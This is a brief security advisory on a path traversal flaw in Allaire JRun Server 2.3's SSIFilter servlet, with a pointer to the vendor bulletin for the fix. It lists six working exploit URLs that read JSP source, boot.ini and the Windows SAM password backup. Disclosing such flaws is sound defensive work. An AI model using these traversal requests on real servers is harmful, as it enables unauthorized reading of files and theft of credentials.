COMMAND

    JRUN

SYSTEMS AFFECTED

    Allaire JRUN Server 2.3

PROBLEM

    Following  is  based   on  a  Foundstone   Security  Advisory   by
    Shreeraj  Shah,  Saumil  Shah  and  Stuart McClure.  Multiple show
    code vulnerabilities exist in  Allaire's JRUN Server 2.3  allowing
    an attacker to  view the source  code of any  file within the  web
    document root of the web server.

    Using  the  same  vulnerability,  it  is also possible to retrieve
    arbitrary files that lie outside the web document root on the host
    operating system's file system.

    JRun 2.3 uses Java Servlets to handle parsing of various types  of
    pages (for example, HTML, JSP, etc).  Based on the settings in the
    rules.properties and servlets.properties files, it is possible  to
    invoke any servlet using the URL prefix "/servlet/".

    It  is  possible  to  use  JRun's  SSIFilter  servlet  to retrieve
    arbitrary files on the target system.  The following two  examples
    show the URLs that can be used to retrieve any arbitrary files:

        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini
        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../winnt/repair/sam._
        http://jrun:8000/servlet/ssifilter/../../test.jsp
        http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
        http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

    Note: It is assumed that JRun runs on host "jrun", port 8000.

SOLUTION

    Follow  the  recommendations  given  in  Allaire Security Bulletin
    ASB00-28.